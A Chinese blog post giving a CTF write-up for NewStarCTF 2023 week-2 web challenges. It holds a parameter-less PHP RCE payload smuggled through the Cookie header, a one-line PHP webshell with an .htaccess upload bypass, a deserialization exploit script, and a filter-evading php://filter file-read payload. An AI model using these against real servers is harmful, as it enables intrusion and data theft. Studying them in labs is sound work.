<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.8.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.8.0" type="image/png" sizes="32x32"><meta name="description" content="赛题回顾">
<meta property="og:type" content="article">
<meta property="og:title" content="NewStarCTF2023-week2-web题wp">
<meta property="og:url" content="https://thenights1.github.io/2023/10/09/newstarweek2/index.html">
<meta property="og:site_name" content="菜鸟的第一个博客">
<meta property="og:description" content="赛题回顾">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009205826.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009205739.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009210104.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009210052.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009113047.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009213751.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010191420.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010192046.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010192209.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010192341.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202023-10-10%20192410.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010202255.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010194700.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010194914.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010195101.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010200417.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010200810.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010201026.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010201124.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010201246.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010201456.png">
<meta property="og:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010201610.png">
<meta property="article:published_time" content="2023-10-09T12:30:14.000Z">
<meta property="article:modified_time" content="2023-10-10T12:32:43.395Z">
<meta property="article:author" content="nevgivup">
<meta property="article:tag" content="ctf回顾">
<meta property="article:tag" content="反序列化">
<meta property="article:tag" content="文件上传绕过">
<meta property="article:tag" content="sql注入">
<meta property="article:tag" content="js控制台">
<meta property="article:tag" content="rce">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009205826.png"><title>NewStarCTF2023-week2-web题wp | 菜鸟的第一个博客</title><link ref="canonical" href="https://thenights1.github.io/2023/10/09/newstarweek2/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.8.0"><link rel="stylesheet" href="css/custom.css"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":true},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.3.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">分类</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/links/"><span class="header-nav-menu-item__icon"><i class="fas fa-solid fa-link"></i></span><span class="header-nav-menu-item__text">友链</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/gallery/"><span class="header-nav-menu-item__icon"><i class="fas fa-image"></i></span><span class="header-nav-menu-item__text">相册</span></a></div></div><div class="header-nav-search"><span class="header-nav-search__icon"><i class="fas fa-search"></i></span><span class="header-nav-search__text">搜索</span></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner" style="background: url(https://pic1.zhimg.com/v2-a3ab6993a8a64f55328a4e33932c4bd4_r.jpg?source=1940ef5c) no-repeat center/cover;"><div class="header-banner-info"><div class="header-banner-info__title">欢迎！来访者</div><div class="header-banner-info__subtitle">愿你前行的道路有群星闪耀，愿你留下的足迹有百花绽放~</div></div><div class="header-banner-arrow"><div class="header-banner-arrow__icon"><i class="fas fa-angle-down"></i></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">NewStarCTF2023-week2-web题wp</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2023-10-09</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2023-10-10</span></span><span class="post-meta-item post-meta-item--wordcount"><span class="post-meta-item__icon"><i class="far fa-file-word"></i></span><span class="post-meta-item__info">字数统计</span><span class="post-meta-item__value">2.7k</span></span><span class="post-meta-item post-meta-item--readtime"><span class="post-meta-item__icon"><i class="far fa-clock"></i></span><span class="post-meta-item__info">阅读时长</span><span class="post-meta-item__value">17分</span></span><span class="post-meta-item post-meta-item--visitors leancloud_visitors" id="/2023/10/09/newstarweek2/" data-flag-title="NewStarCTF2023-week2-web题wp"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">阅读次数</span><span class="post-meta-item__value leancloud-visitors-count"></span></span><span class="post-meta-item post-meta-item--visitors"><span class="post-meta-item__icon"><i class="fas fa-eye"></i></span><span class="post-meta-item__info">阅读次数</span><span class="post-meta-item__value" id="busuanzi_value_page_pv"></span></span></div></header><div class="post-body"><blockquote>
<p>芜湖！！</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009205826.png" alt="" />第一次ak完整的web题，激动的心，颤抖的手，嗨嗨嗨，我来写一下wp，就从最折磨我的也是刚做完的rce题开始。</p>
</blockquote>

        <h2 id="一-rce"   >
          <a href="#一-rce" class="heading-link"><i class="fas fa-link"></i></a><a class="markdownIt-Anchor" href="#一-rce"></a> 一、R!!C!!E!!</h2>
      
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009205739.png" alt="" /></p>
<p>这题点进环境发现提示有泄露信息，但是没有其他任何提示。</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009210104.png" alt="" /></p>
<p>既然没有提示，那就遇事不决先扫一下试试：</p>
<p>扫到有.git/HEAD，猜测是git泄露，Google一下搜到一个工具GitHack，很好用，下载地址和使用说明如下<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://github.com/lijiejie/GitHack" >lijiejie/GitHack: A `.git folder disclosure exploit (github.com)</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009210052.png" alt="" /></p>
<p>然后直接运行脚本，发现已经把泄露的文件下载到本地了，这就是源码和flag的位置。</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009113047.png" alt="" /></p>
<p>源码如下，就是rce了，<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://xn--start-408h789idup85l.sh" >然后查看start.sh</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>，发现flag在根目录下面/flag的位置，那就先看代码如何rce</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="string">&#x27;;&#x27;</span> === <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[^\W]+\((?R)?\)/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$_GET</span>[<span class="string">&#x27;star&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i&#x27;</span>,<span class="variable">$_GET</span>[<span class="string">&#x27;star&#x27;</span>]))&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;star&#x27;</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>最折磨我的地方就是这个正则表达式，网上搜不到具体的原理，但是有相关的题，反正意思就是你的输入只能是a(b(c()))这样的套娃类型，才会被正则表达式识别，最后只剩下“ ; ”，这个正则表达式我在在线正则表达式匹配器上都显示语法错误，不知道为啥到了php里面就这样了。但这个记住就好，如果限制a(b(c()))这样的类型只有这一种写法，应该是只会在题里面出现，真实环境里面应该没有开发者闲得蛋疼用这个正则表达式。然后这种类型的题就是<strong>无参数rce</strong>，应该还挺常见的。</p>

        <h3 id="1无参数rce"   >
          <a href="#1无参数rce" class="heading-link"><i class="fas fa-link"></i></a><a class="markdownIt-Anchor" href="#1无参数rce"></a> 1.无参数rce</h3>
      
<p>可以看看这篇文章，讲的还挺全面的<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://arsenetang.com/2021/07/26/RCE%E7%AF%87%E4%B9%8B%E6%97%A0%E5%8F%82%E6%95%B0rce/#1-getallheaders" >RCE篇之无参数rce | Arsene.Tang (arsenetang.com)</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>以后有空我也要开一个这样的专题讲一讲（新的flag出现了）</p>
<p>这题比较逆天，因为目前的很多无参数rce的博客里面用到的核心主力就是scandir这个函数，用来获取文件名来执行，但是这题给禁用了，不仅禁了这个还禁了其他的很多东西，当时我就觉得这就很难办了啊。<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://developer.aliyun.com/article/1213814" >【CTF竞赛】无参数RCE总结-阿里云开发者社区 (aliyun.com)</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>然后我又在这篇文章里面发现了新的思路，可以通过输出请求头来实现远程rce。</p>
<p>具体思路就是先getallheaders()函数获得请求头，发现有回显，如下</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231009213751.png" alt="" /></p>

        <h3 id="2构造payload"   >
          <a href="#2构造payload" class="heading-link"><i class="fas fa-link"></i></a><a class="markdownIt-Anchor" href="#2构造payload"></a> 2.构造payload</h3>
      
<p>这样就可以想法往请求头里面填恶意代码了，经过测试发现cookie可以实现上述目标，如下</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010191420.png" alt="" /></p>
<p>发现cookie会显示在回显数组中，这样我们就可以想办法提取出数组中cookie的值就可以实现rce了，然后就会用到两个魔法函数array_rand()和array_flip(),其中array_rand是可以取出数组的键名，但是缺点是随机生成的，需要一点运气。但是本题中数组中的键值是cookie，这种情况下就需要另一个函数array_flip()，这个函数可以实现数组的键值和值互换，这样就实现了我们想要的功能，所以到这步的payload为</p>
<figure class="highlight cmake"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">print_r(array_rand(array_flip(getallheaders())))</span><br></pre></td></tr></table></div></figure>
<p>这时候应该会随机输出键名，有机会出现我们注入的恶意代码，如下</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010192046.png" alt="" /></p>
<p>所以我们就可以把print_r改成eval函数实现注入了！</p>
<p>最终就可以输出flag，get flag！</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010192209.png" alt="" /></p>

        <h2 id="二-upload-again"   >
          <a href="#二-upload-again" class="heading-link"><i class="fas fa-link"></i></a><a class="markdownIt-Anchor" href="#二-upload-again"></a> 二、Upload again!</h2>
      
<img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010192341.png" title="" alt="" width="304">
<p>打开网页，发现是很抽象的文件上传</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202023-10-10%20192410.png" alt="" /></p>
<p>按照文件上传的老套路，先上传一个正常的jpg文件试试，结果发现报错了？？显示我上传的文件是php文件，wtf。很迷惑，在抓到的包中直接将2.jpg改成2.php也会被过滤，最后我把文件内容全删了，只上传一个空文件却发现过了，成功上传，然后我又用一个啥也没有的空文件试，发现成功了。这题这里服务器好像出了问题，上传文件就会显示500错误码</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010202255.png" alt="" /></p>
<p>所以我就大概讲讲原理就好</p>
<p>这题经过测试发现过滤了“  ？  ” 这个符号，也就是只要我上传的数据里面有问号就会被认为是php文件，但是并没有过滤php这个字符串，所以就简单了，参考我之前<a href="https://thenights1.github.io/2023/09/07/web3/">写的文章</a>,主要就是利用了.htaccess文件上传，使得jpg文件或者png文件被当做php文件来解析，这样就可以用蚁剑连接了。但是？被过滤了该怎么在jpg文件里面写入一句话代码呢？没办法之后继续Google，发现了另一种php代码的书写方法，参考下面这篇文章</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://blog.csdn.net/bylfsj/article/details/101227210" >php一句话木马变形技巧_php get一句话-CSDN博客</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>如下：</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=<span class="string">&quot;php&quot;</span>&gt;@<span class="title function_ invoke__">eval_r</span>(<span class="variable">$_GET</span>[b])&lt;/script&gt;</span><br></pre></td></tr></table></div></figure>
<p>就是利用script代替<? 、?>标签，这样就绕过了对？的过滤限制，最后就可以用蚁剑连接了。</p>

        <h2 id="三-unserialize"   >
          <a href="#三-unserialize" class="heading-link"><i class="fas fa-link"></i></a><a class="markdownIt-Anchor" href="#三-unserialize"></a> 三、Unserialize？</h2>
      
<p>看题目就知道是反序列化，打开题目有如下代码</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="comment">// Maybe you need learn some knowledge about deserialize?</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">evil</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$cmd</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/cat|tac|more|tail|base/i&quot;</span>, <span class="variable">$this</span>-&gt;cmd))&#123;</span><br><span class="line">            @<span class="title function_ invoke__">system</span>(<span class="variable">$this</span>-&gt;cmd);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">@<span class="title function_ invoke__">unserialize</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;unser&#x27;</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></div></figure>
<p>显然是反序列化并且是有一定的过滤，对于反序列化我之前的<a href="https://thenights1.github.io/2023/09/06/web2/">这篇小总结文章</a>已经讲过，既然是反序列化，那就先写代码，输出序列化之后的值，而且要注意private类型的两侧有\00，这个是无法输出也无法复制的，上次的题是因为有base64编码导致可以复制，但是这题没有，显然就只能生成完了通过代码发往服务器，没办法只能在网上搜了一个php通用的类似python request的函数，剩下的就是反序列化的老生常谈了，把object数量改成大于正常数量，同时把恶意代码放入evil类的cmd中，就会触发destruct函数并执行我们的恶意代码，实现反序列化注入，同时还要绕过正则表达式，最终exp如下</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">send_post</span>(<span class="params"><span class="variable">$url</span>, <span class="variable">$post_data</span></span>) </span>&#123; </span><br><span class="line">    <span class="variable">$postdata</span> = <span class="title function_ invoke__">http_build_query</span>(<span class="variable">$post_data</span>);</span><br><span class="line">    <span class="variable">$options</span> = <span class="keyword">array</span>(</span><br><span class="line">      <span class="string">&#x27;http&#x27;</span> =&gt; <span class="keyword">array</span>(</span><br><span class="line">        <span class="string">&#x27;method&#x27;</span> =&gt; <span class="string">&#x27;POST&#x27;</span>,</span><br><span class="line">       <span class="string">&#x27;header&#x27;</span> =&gt; <span class="string">&#x27;Content-type:application/x-www-form-urlencoded&#x27;</span>,</span><br><span class="line">       <span class="string">&#x27;content&#x27;</span> =&gt; <span class="variable">$postdata</span>,</span><br><span class="line">        <span class="string">&#x27;timeout&#x27;</span> =&gt; <span class="number">15</span> * <span class="number">60</span> <span class="comment">// 超时时间（单位:s）</span></span><br><span class="line">      )</span><br><span class="line">    );</span><br><span class="line">    <span class="variable">$context</span> = <span class="title function_ invoke__">stream_context_create</span>(<span class="variable">$options</span>);</span><br><span class="line">    <span class="variable">$result</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$url</span>, <span class="literal">false</span>, <span class="variable">$context</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$result</span>;</span><br><span class="line">  &#125;  </span><br><span class="line">  </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">evil</span> </span>&#123; </span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$cmd</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$cmd</span></span>) </span>&#123; </span><br><span class="line">        <span class="variable language_">$this</span>-&gt;cmd = <span class="variable">$cmd</span>; </span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/cat|tac|more|tail|base/i&quot;</span>, <span class="variable">$this</span>-&gt;cmd))&#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&#x27;get it&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>) </span>&#123; </span><br><span class="line">        <span class="keyword">if</span> (<span class="variable language_">$this</span>-&gt;cmd != <span class="string">&#x27;index.php&#x27;</span>) &#123; </span><br><span class="line">            <span class="comment">//the secret is in the fl4g.php</span></span><br><span class="line">            <span class="variable language_">$this</span>-&gt;cmd = <span class="string">&#x27;index.php&#x27;</span>; </span><br><span class="line">        &#125; </span><br><span class="line">    &#125; </span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$c</span> = <span class="keyword">new</span> <span class="title function_ invoke__">evil</span>(<span class="string">&quot;ls /&quot;</span>);</span><br><span class="line"><span class="variable">$a</span> = <span class="title function_ invoke__">serialize</span>(<span class="variable">$c</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//$a = str_replace(&quot;O:4&quot;,&quot;O:+4&quot;,$a);</span></span><br><span class="line"><span class="variable">$a</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">&quot;:1:&quot;</span>,<span class="string">&quot;:2:&quot;</span>,<span class="variable">$a</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$a</span>;</span><br><span class="line"><span class="variable">$post_data</span>=<span class="keyword">array</span>(<span class="string">&#x27;unser&#x27;</span> =&gt; <span class="variable">$a</span>);</span><br><span class="line"><span class="variable">$text</span>=<span class="title function_ invoke__">send_post</span>(<span class="string">&quot;http://e80e149a-1640-4d65-bae5-d3e742351d5b.node4.buuoj.cn:81/&quot;</span>,<span class="variable">$post_data</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$text</span>;</span><br><span class="line"><span class="comment">//print(serialize($c));</span></span><br><span class="line"><span class="comment">//var_dump(base64_encode($a));</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></div></figure>
<p>运行一下发现成功注入，服务器端执行了我们的ls代码，并且发现了flag文件，这样就简单了</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010194700.png" alt="" /></p>
<p>想办法打开flag文件就行，这里发现题中过滤了很多打开函数，但是没有过滤全，这里补一下知识：</p>
<figure class="highlight cmake"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">cat：从第一行开始显示文本内容（适用于内容较少的）</span><br><span class="line">tac：从最后一行开始显示，是 cat 的逆顺序</span><br><span class="line">more：一页一页的显示文本内容（适用于内容较多的）</span><br><span class="line"><span class="keyword">less</span>：与 more 类似，但是比 more 更好的是，它可以往前翻页！</span><br><span class="line">head：只看文本的前面几行</span><br><span class="line">tail：只看文本的后面几行</span><br><span class="line">nl：显示文本内容与行号</span><br></pre></td></tr></table></div></figure>
<p>所以只需要找没有被过滤的命令就可以拿到flag了，经过测试 head和nl都可以，但是less不可以，也不知道为什么。</p>
<p><img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010194914.png" alt="" /></p>

        <h2 id="四-ez_sql"   >
          <a href="#四-ez_sql" class="heading-link"><i class="fas fa-link"></i></a><a class="markdownIt-Anchor" href="#四-ez_sql"></a> 四、ez_sql</h2>
      
<p>这题就是简单的用sqlmap注入一下就可以拿到flag，彻彻底底的脚本小子（doge），所以这题我先不在这里写，之后我会开一个sql注入的专题，到时候再讲</p>

        <h2 id="五-include-0-0"   >
          <a href="#五-include-0-0" class="heading-link"><i class="fas fa-link"></i></a><a class="markdownIt-Anchor" href="#五-include-0-0"></a> 五、include 0。0</h2>
      
<img src="https://blogkkk-1319553185.cos.ap-shanghai.myqcloud.com/img/20231010195101.png" title="" alt="" width="463">
<p>根据题目描述，显然是文件包含漏洞，打开题目，代码如下</p>
<figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="comment">// FLAG in the flag.php</span></span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>) &amp;&amp; !<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/base|rot/i&#x27;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">    @<span class="keyword">include</span>(<span class="variable">$file</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;nope&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span> nope</span><br></pre></td></tr></table></div></figure>
<p>代码很少很简单，很容易分析代码，同时还告诉你了flag的位置，那我们需要的就是通过include漏洞来显示flag.php的内容。这个类型我之前也写过，但是没有写专题，之后也会写的，可以参考这篇文章<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.cnblogs.com/Zeker62/p/15322771.html#php%E4%BC%AA%E5%8D%8F%E8%AE%AE" >✔PHP文件包含漏洞全面总结 - Zeker62 - 博客园 (cnblogs.com)</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>其中的php://input被禁用了，无法使用，同时题里面过滤了base和rot，反向也能推断出这里可以用php://filter来实现，通用模式如下</p>
<figure class="highlight cmake"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?filename=php://filter/read=convert.base64-encode/resource=xxx.php</span><br><span class="line">?filename=php://filter/convert.base64-encode/resource=xxx.php</span><br></pre></td></tr></table></div></figure>
<p>所以这题我们就可以用：</p>
<p><code>?file=php://filter/read=convert.base64-encode/resource=flag.php</code></p>
<p>但是base被过滤了我们怎么办，这里我是把base中的a改成url编码形式的%61，这样发现就可以绕过了并且include成功执行，输出flag的base64编码，解码一下拿到flag</p>
